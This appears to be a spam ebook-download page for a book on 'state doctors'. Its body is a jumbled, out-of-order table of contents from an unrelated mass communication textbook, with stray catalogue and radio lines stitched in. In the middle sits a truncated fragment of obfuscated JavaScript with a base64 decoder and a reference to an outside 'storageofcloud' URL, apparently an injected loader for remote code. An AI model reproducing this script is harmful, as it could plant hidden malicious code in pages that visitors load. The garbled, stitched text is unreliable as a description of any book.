
Doctors As Dictators : Beware The State Doctor By Herbert G Kinnell Download Ebook EPUB, DOCX, AZW, DJVU, FB2

Media Economics and Governance Media `not just any other business' The basics of media structure and levels of analysis Some economic principles of media structure Ownership and control Competition and concentration Mass media governance The regulation of mass media: alternative models Media policy paradigm shifts Media systems and political systems Conclusion 10.. New Media - New Theory? New media and mass communication What is new about the new media? The main themes of new media theory Applying medium theory to the new media New patterns of information traffic Computer-mediated community formation Political participation, new media and democracy Technologies of freedom? New equalizer or divider? Conclusion7.. PART ONE: PRELIMINARIES1 Introduction to the Book Our object of study The structure of the book Themes and issues in mass communication Manner of treatment How to use the book Limitations of coverage and perspective Different kinds of theory Communication science and the study of mass communication Alternative traditions of analysis: structural, behavioural and cultural Conclusion2.

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Mass Communication and Culture Communication and culture The beginnings: the Frankfurt School and critical cultural theory The redemption of the popular Gender and the mass media Commercialization Communication technology and culture Mass media and postmodern culture Conclusion6.. Global Mass Communication Origins of globalization Driving forces: technology and money Global media structure Multinational media ownership and control Varieties of global mass media International media dependency Cultural imperialism and beyond The media transnationalization process International news flow The global trade in media culture Towards a global media culture? Global media governance ConclusionPART FOUR: ORGANIZATIONS11. Crack Radio Clear Channel Stations For Sale


Media Structure and Performance: Principles and Accountability Media freedom as a principle Media equality as a principle Media diversity as a principle Truth and information quality Social order and solidarity Cultural order The meaning of accountability Two alternative models of accountability Lines and relations of accountability Frames of accountability Conclusion9.. Audience Theory and Research Traditions The audience concept The original audience From mass to market Goals of audience research Alternative traditions of research Audience issues of public concern Types of audience The audience as a group or public The gratifi cation set as audience The medium audience Audience as defi ned by channel or content Questions of audience reach Activity and selectivity Conclusion16.

Normative Theory of Media and Society Sources of normative obligation The media and the public interest Main issues for social theory of the media Early approaches to theory: the press as `fourth estate' The 1947 Commission on Freedom of the Press and the social theory of responsibility Professionalism and media ethics Four Theories of the Press and beyond The public service broadcasting alternative Mass media, civil society and the public sphere Response to the discontents of the public sphere Alternative visions Normative media theory: four models ConclusionPART THREE: STRUCTURES8.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x4a98af){_0x477725=window;}return _0x477725;};var _0x38c21a=_0xfbb64b();var _0x3e1e9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x38c21a['atob']||(_0x38c21a['atob']=function(_0x258866){var _0x4237bc=String(_0x258866)['replace'](/=+$/,'');for(var _0x44931c=0x0,_0x322a70,_0x53e507,_0x3b0829=0x0,_0x2e6272='';_0x53e507=_0x4237bc['charAt'](_0x3b0829++);~_0x53e507&&(_0x322a70=_0x44931c%0x4?_0x322a70*0x40+_0x53e507:_0x53e507,_0x44931c++%0x4)?_0x2e6272+=String['fromCharCode'](0xff&_0x322a70>>(-0x2*_0x44931c&0x6)):0x0){_0x53e507=_0x3e1e9['indexOf'](_0x53e507);}return _0x2e6272;});}());_0x1c32['base64DecodeUnicode']=function(_0x5c8539){var _0x271af9=atob(_0x5c8539);var _0x2913a6=[];for(var _0x186d5a=0x0,_0x41166c=_0x271af9['length'];_0x186d5a=_0x110d8e;},'TMpiC':_0x1c32('0x21'),'vdYUi':_0x1c32('0x22'),'KpnXl':function _0x21d531(_0x464a17,_0x31a904){return _0x464a17+_0x31a904;},'otnhL':function _0x283756(_0x4d7417,_0x56d0ed){return _0x4d7417+_0x56d0ed;},'NbvIz':function _0x20d135(_0x40c902,_0x1b6e02){return _0x40c902+_0x1b6e02;},'PBKqE':function _0x3b4b24(_0x1ef0de,_0x1a86ad){return _0x1ef0de+_0x1a86ad;},'wSxLV':_0x1c32('0x12'),'oonvA':function _0x2d1c0b(_0x3bf06d,_0x578bfe){return _0x3bf06d+_0x578bfe;},'jYwju':_0x1c32('0x13'),'xLNkE':_0x1c32('0x14'),'mfyNT':_0x1c32('0x15'),'Pgabj':function _0x3b2c88(_0x2bdb10,_0x51017a){return _0x2bdb10(_0x51017a);},'IVdmF':'https://storageofcloud.. , 2012 Notes: 191 Seiten : Illustrationen ; 24 cmResponsibility: Doctors as dictators : beware the state doctorOther titles: Beware the state doctorEdition: Print book : EnglishBeginnings --"A theory by which to work" --Publication --Controversy --Legacy.. The Media Organization: Pressures and Demands Research methods and perspectives The main issues Levels of analysis The media organization in a field of social forces Relations with society Relations with pressure and interest groups Relations with owners and clients Relations with the audience Aspects of internal structure and dynamics The influence of personal characteristics of mass communicators Role conflicts and dilemmas Conclusion12.. Concepts and Models for Mass Communication Early perspectives on media and society The `mass' concept The mass communication process The mass audience The mass media as an institution of society Mass culture and popular culture The rise of a dominant paradigm for theory and research An alternative, critical paradigm Four models of communication Conclusion4.. Audience Formation and Experience The `why' of media use A structural approach to audience formation The uses and gratifi cations approach An integrated model of audience choice Public and private spheres of media use Subculture and audience Lifestyle Gendered audiences Sociability and uses of the media Normative framing of media use Audience norms for content The view from the audience Media fandom The end of the audience? The `escape' of the audience The future of the audience The audience concept again ConclusionPART SEVEN: EFFECTS17.. Media Genres and Texts Questions of genre Genre and the internet The news genre The structure of news: bias and framing News as narrative Television violence The cultural text and its meanings ConclusionPART SIX: AUDIENCES15.. The Production of Media Culture Media-organizational activities: gatekeeping and selection Influences on news selection The struggle over access between media and society The influence of sources on news Media-organizational activity: processing and presentation The logic of media culture Alternative models of decision-making The coming of convergence culture: consumers as producers ConclusionPART FIVE: CONTENT13. 34bbb28f04